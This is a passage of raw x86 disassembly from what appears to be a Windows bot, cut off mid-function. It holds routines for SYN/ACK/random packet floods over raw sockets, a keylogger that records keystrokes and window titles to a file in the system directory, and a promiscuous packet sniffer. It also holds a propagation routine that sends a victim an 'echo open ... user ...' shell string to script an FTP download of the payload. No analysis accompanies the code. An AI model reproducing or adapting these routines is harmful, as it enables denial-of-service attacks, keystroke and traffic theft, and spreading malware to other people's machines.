push offset dword_423400
push eax
call sub_415316
add esp, 0Ch
cmp [ebp+var_A8], ebx
jnz short loc_401CFB
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_412BD1
add esp, 14h
loc_401CFB: ; CODE XREF: sub_401BD4+102�j
lea eax, [ebp+var_440]
push eax
call sub_40B078
push [ebp+var_BC]
call sub_4150F0
pop ecx
pop ecx
push ebx
call dword_421048 ; ExitThread
loc_401D1B: ; CODE XREF: sub_401BD4+DF�j
lea eax, [ebp+var_23C]
push eax
call dword_43CA64 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_401D8B
lea eax, [ebp+var_440]
push offset dword_4233CC
push eax
call sub_415316
cmp [ebp+var_A8], ebx
pop ecx
pop ecx
jnz short loc_401D6B
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_412BD1
add esp, 14h
loc_401D6B: ; CODE XREF: sub_401BD4+172�j
lea eax, [ebp+var_440]
push eax
call sub_40B078
push [ebp+var_BC]
call sub_4150F0
pop ecx
pop ecx
push ebx
call dword_421048 ; ExitThread
loc_401D8B: ; CODE XREF: sub_401BD4+157�j
push 10h
lea eax, [ebp+var_44]
push ebx
push eax
call sub_415390
add esp, 0Ch
mov [ebp+var_44], 2
push ebx
call dword_43CA24 ; ntohs
mov [ebp+var_42], ax
lea eax, [ebp+var_23C]
push eax
call dword_43CA64 ; inet_addr
mov [ebp+var_40], eax
mov [ebp+arg_0], ebx
call edi ; GetTickCount
mov [ebp+var_30], eax
jmp loc_401FF3
; ---------------------------------------------------------------------------
loc_401DC8: ; CODE XREF: sub_401BD4+433�j
push 28h
mov [ebp+var_2C], 45h
call dword_43CA24 ; ntohs
cmp [ebp+var_B0], ebx
mov [ebp+var_2A], ax
mov [ebp+var_28], si
mov [ebp+var_26], bx
mov [ebp+var_24], 80h
mov [ebp+var_23], 6
mov [ebp+var_22], bx
jz short loc_401E21
call sub_415372
mov esi, eax
shl esi, 8
call sub_415372
add esi, eax
shl esi, 8
call sub_415372
add esi, eax
shl esi, 8
call sub_415372
add esi, eax
mov [ebp+var_20], esi
xor esi, esi
inc esi
jmp short loc_401E37
; ---------------------------------------------------------------------------
loc_401E21: ; CODE XREF: sub_401BD4+21E�j
push [ebp+var_240]
call sub_40A08A
pop ecx
push eax
call dword_43CA64 ; inet_addr
mov [ebp+var_20], eax
loc_401E37: ; CODE XREF: sub_401BD4+24B�j
mov eax, [ebp+var_40]
cmp [ebp+var_B8], ebx
mov [ebp+var_1C], eax
jnz short loc_401E55
call sub_415372
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_401E5B
; ---------------------------------------------------------------------------
loc_401E55: ; CODE XREF: sub_401BD4+26F�j
push [ebp+var_B8]
loc_401E5B: ; CODE XREF: sub_401BD4+27F�j
call dword_43CA24 ; ntohs
mov [ebp+var_16], ax
call sub_415372
cdq
mov ecx, 401h
idiv ecx
push edx
call dword_43CA24 ; ntohs
push 12345678h
mov [ebp+var_18], ax
call dword_43CA20 ; ntohl
mov [ebp+var_14], eax
lea eax, [ebp+var_1BC]
push offset aSyn ; "syn"
push eax
call sub_4158E0
pop ecx
test eax, eax
pop ecx
jz short loc_401EAB
mov [ebp+var_10], ebx
mov [ebp+var_B], 2
jmp short loc_401F07
; ---------------------------------------------------------------------------
loc_401EAB: ; CODE XREF: sub_401BD4+2CC�j
lea eax, [ebp+var_1BC]
push offset aAck ; "ack"
push eax
call sub_4158E0
pop ecx
test eax, eax
pop ecx
jz short loc_401ECB
mov [ebp+var_10], ebx
mov [ebp+var_B], 10h
jmp short loc_401F07
; ---------------------------------------------------------------------------
loc_401ECB: ; CODE XREF: sub_401BD4+2EC�j
lea eax, [ebp+var_1BC]
push offset aRandom ; "random"
push eax
call sub_4158E0
pop ecx
test eax, eax
pop ecx
jz short loc_401F07
call sub_415372
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_10], edx
call sub_415372
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+var_B], dl
loc_401F07: ; CODE XREF: sub_401BD4+2D5�j
; sub_401BD4+2F5�j ...
push 200h
mov [ebp+var_C], 50h
call dword_43CA24 ; ntohs
mov [ebp+var_A], ax
mov eax, [ebp+var_20]
mov [ebp+var_64], eax
mov eax, [ebp+var_1C]
push 14h
mov [ebp+var_6], bx
mov [ebp+var_8], bx
mov [ebp+var_60], eax
mov [ebp+var_5C], bl
mov [ebp+var_5B], 6
call dword_43CA24 ; ntohs
mov [ebp+var_5A], ax
lea eax, [ebp+var_64]
push 20h
push eax
lea eax, [ebp+var_A0]
push eax
call sub_4153F0
lea eax, [ebp+var_18]
push 14h
push eax
lea eax, [ebp+var_80]
push eax
call sub_4153F0
lea eax, [ebp+var_A0]
push 34h
push eax
call sub_40A0E3
mov [ebp+var_8], ax
lea eax, [ebp+var_2C]
push 14h
push eax
lea eax, [ebp+var_A0]
push eax
call sub_4153F0
lea eax, [ebp+var_18]
push 14h
push eax
lea eax, [ebp+var_8C]
push eax
call sub_4153F0
push 4
lea eax, [ebp+var_78]
push ebx
push eax
call sub_415390
add esp, 44h
lea eax, [ebp+var_A0]
push 28h
push eax
call sub_40A0E3
mov [ebp+var_22], ax
lea eax, [ebp+var_2C]
push 14h
push eax
lea eax, [ebp+var_A0]
push eax
call sub_4153F0
add esp, 14h
lea eax, [ebp+var_44]
push 10h
push eax
push ebx
lea eax, [ebp+var_A0]
push 3Ch
push eax
push [ebp+var_4]
call dword_43CA88 ; sendto
cmp eax, 0FFFFFFFFh
jz loc_40209E
inc [ebp+arg_0]
loc_401FF3: ; CODE XREF: sub_401BD4+1EF�j
call edi ; GetTickCount
sub eax, [ebp+var_30]
mov ecx, 3E8h
xor edx, edx
div ecx
cmp eax, [ebp+var_B4]
jbe loc_401DC8
push [ebp+var_4]
call dword_43CABC ; closesocket
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_B4]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_23C]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_1BC]
push eax
lea eax, [ebp+var_440]
push offset dword_423358
push eax
call sub_415316
add esp, 1Ch
cmp [ebp+var_A8], ebx
jnz short loc_40207E
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_412BD1
add esp, 14h
loc_40207E: ; CODE XREF: sub_401BD4+485�j
lea eax, [ebp+var_440]
push eax
call sub_40B078
push [ebp+var_BC]
call sub_4150F0
pop ecx
pop ecx
push ebx
call dword_421048 ; ExitThread
loc_40209E: ; CODE XREF: sub_401BD4+416�j
push [ebp+var_4]
call dword_43CABC ; closesocket
call dword_43C9B8 ; WSAGetLastError
push eax
lea eax, [ebp+var_23C]
push [ebp+arg_0]
push eax
push offset dword_4232F0
lea eax, [ebp+var_440]
push 200h
push eax
call sub_41588A
add esp, 18h
cmp [ebp+var_A8], ebx
jnz short loc_4020FC
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_412BD1
add esp, 14h
loc_4020FC: ; CODE XREF: sub_401BD4+503�j
lea eax, [ebp+var_440]
push eax
call sub_40B078
push [ebp+var_BC]
call sub_4150F0
pop ecx
pop ecx
push ebx
call dword_421048 ; ExitThread
sub_401BD4 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40211C proc near ; CODE XREF: sub_4021FB+B4�p
; sub_4021FB+247�p
var_314 = byte ptr -314h
var_114 = byte ptr -114h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = byte ptr 14h
arg_8C = dword ptr 94h
arg_90 = dword ptr 98h
push ebp
mov ebp, esp
loc_40211F: ; DATA XREF: .text:off_42F640�o
sub esp, 314h
lea eax, [ebp+var_10]
push esi
push eax
call dword_42105C ; GetLocalTime
lea eax, [ebp+var_114]
push 104h
push eax
call dword_421058 ; GetSystemDirectoryA
lea eax, [ebp+var_114]
push offset asc_423C48 ; "\\"
push eax
call sub_415A30
lea eax, [ebp+var_114]
push offset dword_42C2C4
push eax
call sub_415A30
lea eax, [ebp+var_114]
push offset aAb ; "ab"
push eax
call sub_415A08
mov esi, eax
add esp, 18h
test esi, esi
jnz short loc_402181
inc eax
jmp short loc_4021F8
; ---------------------------------------------------------------------------
loc_402181: ; CODE XREF: sub_40211C+60�j
movzx eax, [ebp+var_4]
push [ebp+arg_0]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset aDDDDDDS ; "[%d-%d-%d %d:%d:%d] %s\r\n"
push esi
call sub_4159B6
push esi
call sub_415960
add esp, 28h
cmp [ebp+arg_90], 0
jnz short loc_4021F6
push [ebp+arg_0]
lea eax, [ebp+var_314]
push offset dword_423C04
push 200h
push eax
call sub_41588A
push 0
lea eax, [ebp+var_314]
push [ebp+arg_8C]
push eax
lea eax, [ebp+arg_C]
push eax
push [ebp+arg_4]
call sub_412BD1
add esp, 24h
loc_4021F6: ; CODE XREF: sub_40211C+A1�j
xor eax, eax
loc_4021F8: ; CODE XREF: sub_40211C+63�j
pop esi
leave
retn
sub_40211C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4021FB proc near ; DATA XREF: sub_40CD3A+1D95�o
var_8DC = dword ptr -8DCh
var_8D8 = byte ptr -8D8h
var_4DC = byte ptr -4DCh
var_2DD = byte ptr -2DDh
var_2DC = byte ptr -2DCh
var_DC = byte ptr -0DCh
var_D8 = dword ptr -0D8h
var_48 = byte ptr -48h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8DCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
and [ebp+var_8DC], 0
push 25h
and [ebp+var_4], 0
pop ecx
mov esi, eax
lea edi, [ebp+var_DC]
rep movsd
mov dword ptr [eax+90h], 1
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_8D8]
rep stosd
call dword_43C9AC ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
mov [ebp+var_8], eax
call dword_43C9C0 ; GetWindowTextA
mov ebx, 200h
loc_402256: ; CODE XREF: sub_4021FB+2BB�j
push 8
call dword_421060 ; Sleep
call dword_43C9AC ; GetForegroundWindow
cmp eax, [ebp+var_8]
jz short loc_4022DE
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
mov [ebp+var_8], eax
call dword_43C9C0 ; GetWindowTextA
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2DC]
push eax
lea eax, [ebp+var_4DC]
push offset aSChangedWindow ; "%s (Changed Windows: %s)"
push eax
call sub_415316
sub esp, 84h
lea esi, [ebp+var_DC]
lea eax, [ebp+var_4DC]
push 25h
pop ecx
mov edi, esp
push eax
rep movsd
call sub_40211C
mov [ebp+var_4], eax
push ebx
lea eax, [ebp+var_2DC]
push 0
push eax
call sub_415390
add esp, 0A4h
lea eax, [ebp+var_4DC]
push ebx
push 0
push eax
call sub_415390
add esp, 0Ch
loc_4022DE: ; CODE XREF: sub_4021FB+6C�j
mov [ebp+arg_0], offset aB ; "b"
loc_4022E5: ; CODE XREF: sub_4021FB+2B1�j
push 10h
call dword_43C904 ; GetKeyState
movsx esi, ax
mov eax, [ebp+arg_0]
mov edi, [eax-4]
push edi
call dword_43C9F0 ; GetAsyncKeyState
test ah, ah
jns short loc_40237C
push 14h
call dword_43C904 ; GetKeyState
test ax, ax
jz short loc_40232D
cmp esi, 0FFFFFFFFh
jle short loc_40232D
cmp edi, 40h
jle short loc_40232D
cmp edi, 5Bh
jge short loc_40232D
mov [ebp+edi*4+var_8DC], 1
jmp loc_4024A1
; ---------------------------------------------------------------------------
loc_40232D: ; CODE XREF: sub_4021FB+111�j
; sub_4021FB+116�j ...
push 14h
call dword_43C904 ; GetKeyState
test ax, ax
jz short loc_402358
test esi, esi
jge short loc_40236C
cmp edi, 40h
jle short loc_402358
cmp edi, 5Bh
jge short loc_402358
mov [ebp+edi*4+var_8DC], 2
jmp loc_4024A1
; ---------------------------------------------------------------------------
loc_402358: ; CODE XREF: sub_4021FB+13D�j
; sub_4021FB+146�j ...
test esi, esi
jge short loc_40236C
mov [ebp+edi*4+var_8DC], 3
jmp loc_4024A1
; ---------------------------------------------------------------------------
loc_40236C: ; CODE XREF: sub_4021FB+141�j
; sub_4021FB+15F�j
mov [ebp+edi*4+var_8DC], 4
jmp loc_4024A1
; ---------------------------------------------------------------------------
loc_40237C: ; CODE XREF: sub_4021FB+104�j
lea eax, [ebp+edi*4+var_8DC]
mov esi, [eax]
test esi, esi
jz loc_4024A1
and dword ptr [eax], 0
lea eax, [ebp+var_2DC]
push eax
call sub_415B10
cmp edi, 8
pop ecx
jnz short loc_4023AF
and [ebp+eax+var_2DD], 0
jmp loc_4024A1
; ---------------------------------------------------------------------------
loc_4023AF: ; CODE XREF: sub_4021FB+1A5�j
cmp eax, 1B9h
jbe short loc_4023DB
call dword_43C9AC ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
call dword_43C9C0 ; GetWindowTextA
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2DC]
push eax
push offset aSBufferFullS ; "%s (Buffer full) (%s)"
jmp short loc_40241C
; ---------------------------------------------------------------------------
loc_4023DB: ; CODE XREF: sub_4021FB+1B9�j
cmp edi, 0Dh
jnz loc_402473
lea eax, [ebp+var_2DC]
push eax
call sub_415B10
test eax, eax
pop ecx
jz loc_4024A1
call dword_43C9AC ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
call dword_43C9C0 ; GetWindowTextA
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2DC]
push eax
push offset aSReturnS ; "%s (Return) (%s)"
loc_40241C: ; CODE XREF: sub_4021FB+1DE�j
lea eax, [ebp+var_4DC]
push eax
call sub_415316
sub esp, 84h
lea esi, [ebp+var_DC]
lea eax, [ebp+var_4DC]
push 25h
pop ecx
mov edi, esp
push eax
rep movsd
call sub_40211C
mov [ebp+var_4], eax
push ebx
lea eax, [ebp+var_2DC]
push 0
push eax
call sub_415390
add esp, 0A4h
lea eax, [ebp+var_4DC]
push ebx
push 0
push eax
call sub_415390
add esp, 0Ch
jmp short loc_4024A1
; ---------------------------------------------------------------------------
loc_402473: ; CODE XREF: sub_4021FB+1E3�j
cmp esi, 1
jz short loc_40248C
cmp esi, 3
jz short loc_40248C
cmp esi, 2
jz short loc_402487
cmp esi, 4
jnz short loc_4024A1
loc_402487: ; CODE XREF: sub_4021FB+285�j
push [ebp+arg_0]
jmp short loc_402493
; ---------------------------------------------------------------------------
loc_40248C: ; CODE XREF: sub_4021FB+27B�j
; sub_4021FB+280�j
mov eax, [ebp+arg_0]
add eax, 7
push eax
loc_402493: ; CODE XREF: sub_4021FB+28F�j
lea eax, [ebp+var_2DC]
push eax
call sub_415A30
pop ecx
pop ecx
loc_4024A1: ; CODE XREF: sub_4021FB+12D�j
; sub_4021FB+158�j ...
add [ebp+arg_0], 14h
cmp [ebp+arg_0], offset dword_423BCC
jl loc_4022E5
cmp [ebp+var_4], 0
jz loc_402256
push [ebp+var_D8]
call sub_4150F0
pop ecx
push 0
call dword_421048 ; ExitThread
sub_4021FB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4024D0 proc near ; DATA XREF: sub_40CD3A+1BE7�o
var_102B4 = byte ptr -102B4h
var_102AB = byte ptr -102ABh
var_102A8 = dword ptr -102A8h
var_102A0 = dword ptr -102A0h
var_10293 = byte ptr -10293h
var_1028C = byte ptr -1028Ch
var_2B4 = byte ptr -2B4h
var_B4 = dword ptr -0B4h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 102B4h
call sub_415B90
mov edx, [ebp+arg_0]
push esi
push edi
push 25h
xor eax, eax
pop ecx
mov esi, edx
lea edi, [ebp+var_B4]
inc eax
push 10h
rep movsd
mov [ebp+var_8], eax
mov [edx+90h], eax
xor esi, esi
lea eax, [ebp+var_1C]
push esi
push eax
call sub_415390
add esp, 0Ch
mov [ebp+var_1C], 2
push esi
call dword_43CA24 ; ntohs
push [ebp+var_B4]
mov [ebp+var_1A], ax
call sub_40A08A
pop ecx
push eax
call dword_43CA64 ; inet_addr
push esi
push 3
push 2
mov [ebp+var_18], eax
call dword_43CAA4 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jnz short loc_4025A5
call dword_43C9B8 ; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push offset unk_424650
push eax
call sub_415316
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_402588
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_412BD1
add esp, 14h
loc_402588: ; CODE XREF: sub_4024D0+96�j
lea eax, [ebp+var_2B4]
push eax
call sub_40B078
push [ebp+var_30]
call sub_4150F0
pop ecx
pop ecx
push esi
call dword_421048 ; ExitThread
loc_4025A5: ; CODE XREF: sub_4024D0+76�j
mov eax, [ebp+var_30]
push 10h
imul eax, 234h
mov dword_441BA4[eax], edi
lea eax, [ebp+var_1C]
push eax
push edi
call dword_43CA50 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_40262A
call dword_43C9B8 ; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push offset unk_424608
push eax
call sub_415316
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_402606
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_412BD1
add esp, 14h
loc_402606: ; CODE XREF: sub_4024D0+114�j
lea eax, [ebp+var_2B4]
push eax
call sub_40B078
pop ecx
push edi
call dword_43CABC ; closesocket
push [ebp+var_30]
call sub_4150F0
pop ecx
push esi
call dword_421048 ; ExitThread
loc_40262A: ; CODE XREF: sub_4024D0+F4�j
push esi
lea eax, [ebp+var_20]
push esi
push eax
push esi
push esi
lea eax, [ebp+var_8]
push 4
push eax
push 98000001h
push edi
call dword_43C9D0 ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_4026AD
call dword_43C9B8 ; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push offset unk_4245B8
push eax
call sub_415316
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_402689
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_412BD1
add esp, 14h
loc_402689: ; CODE XREF: sub_4024D0+197�j
lea eax, [ebp+var_2B4]
push eax
call sub_40B078
pop ecx
push edi
call dword_43CABC ; closesocket
push [ebp+var_30]
call sub_4150F0
pop ecx
push esi
call dword_421048 ; ExitThread
loc_4026AD: ; CODE XREF: sub_4024D0+177�j
push ebx
mov ebx, offset dword_423CA8
loc_4026B3: ; CODE XREF: sub_4024D0+21C�j
; sub_4024D0+22E�j ...
push 0FFFFh
lea eax, [ebp+var_102B4]
push esi
push eax
call sub_415390
add esp, 0Ch
lea eax, [ebp+var_102B4]
push esi
push 0FFFFh
push eax
push edi
call dword_43CA3C ; recv
cmp eax, 0FFFFFFFFh
jz loc_4027C5
cmp [ebp+var_102AB], 6
jnz short loc_4026B3
mov eax, [ebp+var_102A8]
cmp [ebp+var_10293], 18h
mov [ebp+var_C], eax
jnz short loc_4026B3
lea eax, [ebp+var_1028C]
push offset aPsniff ; "[PSNIFF]"
push eax
call sub_4158E0
pop ecx
test eax, eax
pop ecx
jnz short loc_4026B3
xor edi, edi
mov eax, ebx
mov [ebp+arg_0], ebx
loc_40271E: ; CODE XREF: sub_4024D0+269�j
push eax
lea eax, [ebp+var_1028C]
push eax
call sub_4158E0
pop ecx
test eax, eax
pop ecx
jnz short loc_402743
inc edi
add [ebp+arg_0], 18h
mov eax, [ebp+arg_0]
jnz short loc_40271E
loc_40273B: ; CODE XREF: sub_4024D0+2F0�j
mov edi, [ebp+var_4]
jmp loc_4026B3
; ---------------------------------------------------------------------------
loc_402743: ; CODE XREF: sub_4024D0+25F�j
lea eax, [ebp+var_1028C]
push eax
push [ebp+var_102A0]
call dword_43C960 ; ntohs
movzx eax, ax
push eax
push [ebp+var_C]
call dword_43CAB0 ; inet_ntoa
push eax
lea eax, [edi+edi*2]
mov eax, dword_423CBC[eax*8]
push off_423C98[eax*4]
lea eax, [ebp+var_2B4]
push offset unk_424560
push 200h
push eax
call sub_41588A
add esp, 1Ch
cmp [ebp+var_28], esi
jnz short loc_4027B3
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_412BD1
add esp, 14h
loc_4027B3: ; CODE XREF: sub_4024D0+2C1�j
lea eax, [ebp+var_2B4]
push eax
call sub_40B078
pop ecx
jmp loc_40273B
; ---------------------------------------------------------------------------
loc_4027C5: ; CODE XREF: sub_4024D0+20F�j
call dword_43C9B8 ; WSAGetLastError
push eax
push offset unk_424518
lea eax, [ebp+var_2B4]
push 200h
push eax
call sub_41588A
add esp, 10h
cmp [ebp+var_28], esi
pop ebx
jnz short loc_40280B
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_412BD1
add esp, 14h
loc_40280B: ; CODE XREF: sub_4024D0+319�j
lea eax, [ebp+var_2B4]
push eax
call sub_40B078
pop ecx
push edi
call dword_43CABC ; closesocket
push [ebp+var_30]
call sub_4150F0
pop ecx
push esi
call dword_421048 ; ExitThread
sub_4024D0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40282F proc near ; CODE XREF: sub_40297A+442�p
var_5A4 = byte ptr -5A4h
var_1A4 = byte ptr -1A4h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 5A4h
push ebx
push esi
push edi
xor esi, esi
push 10h
lea eax, [ebp+var_14]
push esi
push eax
call sub_415390
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+var_14], 2
push eax
call dword_4211DC ; inet_addr
mov [ebp+var_10], eax
mov ax, word_424F98
push eax
call dword_4211E0 ; ntohs
push esi
push 1
push 2
mov [ebp+var_12], ax
call dword_4211E4 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz loc_40294F
lea eax, [ebp+var_14]
push 10h
push eax
push edi
call dword_4211E8 ; connect
cmp eax, 0FFFFFFFFh
jz loc_40294F
push esi
lea eax, [ebp+var_5A4]
push 400h
push eax
push edi
call dword_4211EC ; recv
mov esi, offset byte_42C2B4
mov ebx, 190h
push esi
push esi
push offset aDd_ ; "dd."
push offset aDd ; "dd"
push offset a78789 ; "78789"
push offset byte_46AFFD
push offset aEchoOpenSDEqEc ; "echo open %s %d >> eq&echo user %s %s >"...
lea eax, [ebp+var_1A4]
push ebx
push eax
call sub_41588A
add esp, 24h
lea eax, [ebp+var_1A4]
push 0
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_1A4]
push eax
push edi
mov edi, dword_4211F0
call edi ; send
cmp eax, 0FFFFFFFFh
jz short loc_40294F
push 1F4h
call dword_421060 ; Sleep
push esi
push offset dword_425090
lea eax, [ebp+var_1A4]
push ebx
push eax
call sub_41588A
add esp, 10h
lea eax, [ebp+var_1A4]
push 0
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_1A4]
push eax
push [ebp+var_4]
call edi ; send
cmp eax, 0FFFFFFFFh
jnz short loc_402953
loc_40294F: ; CODE XREF: sub_40282F+54�j
; sub_40282F+6A�j ...
xor al, al
jmp short loc_402975
; ---------------------------------------------------------------------------
loc_402953: ; CODE XREF: sub_40282F+11E�j
push 0
lea eax, [ebp+var_5A4]
push 400h
push eax
push [ebp+var_4]
call dword_4211EC ; recv
push [ebp+var_4]
call dword_4211F4 ; closesocket
mov al, 1
loc_402975: ; CODE XREF: sub_40282F+122�j
pop edi
pop esi
pop ebx
leave
retn
sub_40282F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40297A proc near ; CODE XREF: sub_402DD1+11B�p
; sub_402DD1+13D�p
var_89B0 = byte ptr -89B0h
var_8948 = byte ptr -8948h
var_68D8 = byte ptr -68D8h
var_6868 = byte ptr -6868h
var_5DA4 = byte ptr -5DA4h
var_4800 = byte ptr -4800h
var_47FF = byte ptr -47FFh
var_376C = byte ptr -376Ch
var_2CA8 = byte ptr -2CA8h
var_2CA7 = byte ptr -2CA7h
var_2CA4 = byte ptr -2CA4h
var_2C28 = byte ptr -2C28h
var_2458 = byte ptr -2458h
var_1FAD = byte ptr -1FADh
var_1CC0 = byte ptr -1CC0h
var_14DC = byte ptr -14DCh
var_14CC = byte ptr -14CCh
var_11A8 = byte ptr -11A8h
var_11A4 = byte ptr -11A4h
var_1198 = byte ptr -1198h
var_F10 = byte ptr -0F10h
var_E70 = byte ptr -0E70h
var_764 = dword ptr -764h
var_754 = byte ptr -754h
var_740 = byte ptr -740h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
var_B0 = byte ptr -0B0h
var_AD = byte ptr -0ADh
var_83 = byte ptr -83h
var_81 = byte ptr -81h
var_80 = byte ptr -80h
var_38 = byte ptr -38h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = dword ptr -6
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
push ebp
mov ebp, esp
mov eax, 89B0h
call sub_415B90
mov eax, dword_425110
push ebx
mov [ebp+var_10], eax
mov eax, dword_425114
mov [ebp+var_C], eax
push esi
lea eax, [ebp+arg_4]
push edi
push eax
lea eax, [ebp+var_38]
push offset loc_425104
push eax
call sub_415316
add esp, 0Ch
xor eax, eax
loc_4029B1: ; CODE XREF: sub_40297A+4E�j
mov cl, [ebp+eax+var_38]
and [ebp+eax*2+var_FF], 0
mov [ebp+eax*2+var_100], cl
inc eax
cmp eax, 28h
jl short loc_4029B1
push 60h
lea eax, [ebp+var_B0]
push offset dword_424B90
push eax
call sub_4153F0
lea eax, [ebp+var_38]
push eax
call sub_415B10
add eax, eax
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_80]
push eax
call sub_4153F0
add esp, 1Ch
lea eax, [ebp+var_38]
push 9
push (offset aC+3)
push eax
call sub_415B10
pop ecx
lea eax, [ebp+eax*2+var_81]
push eax
call sub_4153F0
lea eax, [ebp+var_38]
push eax
call sub_415B10
add al, 1Ah
push 1
add al, al
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax
lea eax, [ebp+var_AD]
push eax
call sub_4153F0
lea eax, [ebp+var_38]
push eax
call sub_415B10
add al, al
push 1
add al, 9
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax
lea eax, [ebp+var_83]
push eax
call sub_4153F0
mov ax, word_424F98
add esp, 2Ch
push eax
call dword_4211E0 ; ntohs
xor eax, 9999h
push 2
mov [ebp+var_6], eax
lea eax, [ebp+var_6]
push eax
push offset dword_424888
call sub_4153F0
add esp, 0Ch
cmp [ebp+arg_C0], 0
jz loc_402B73
mov edi, 0DACh
lea eax, [ebp+var_1CC0]
push edi
push 90h
push eax
call sub_415390
mov eax, [ebp+arg_C0]
push 4
imul eax, 3Ch
lea ebx, dword_424FD8[eax]
lea eax, [ebp+var_14DC]
push ebx
push eax
call sub_4153F0
mov esi, offset loc_4247D8
push esi
call sub_415B10
push eax
lea eax, [ebp+var_14CC]
push esi
push eax
call sub_4153F0
push 4
lea eax, [ebp+var_11A8]
push offset loc_4250FC
push eax
call sub_4153F0
push 4
lea eax, [ebp+var_11A4]
push ebx
push eax
call sub_4153F0
add esp, 40h
push esi
call sub_415B10
push eax
lea eax, [ebp+var_1198]
push esi
push eax
call sub_4153F0
add esp, 10h
xor eax, eax
loc_402B22: ; CODE XREF: sub_40297A+1C1�j
mov cl, [ebp+eax+var_1CC0]
and [ebp+eax*2+var_47FF], 0
mov [ebp+eax*2+var_4800], cl
inc eax
cmp eax, edi
jl short loc_402B22
and [ebp+var_2CA8], 0
and [ebp+var_2CA7], 0
mov esi, 1C52h
lea eax, [ebp+var_89B0]
push esi
push 31h
push eax
call sub_415390
push esi
lea eax, [ebp+var_68D8]
push 31h
push eax
call sub_415390
add esp, 18h
jmp short loc_402BCA
; ---------------------------------------------------------------------------
loc_402B73: ; CODE XREF: sub_40297A+116�j
push 7D0h
lea eax, [ebp+var_F10]
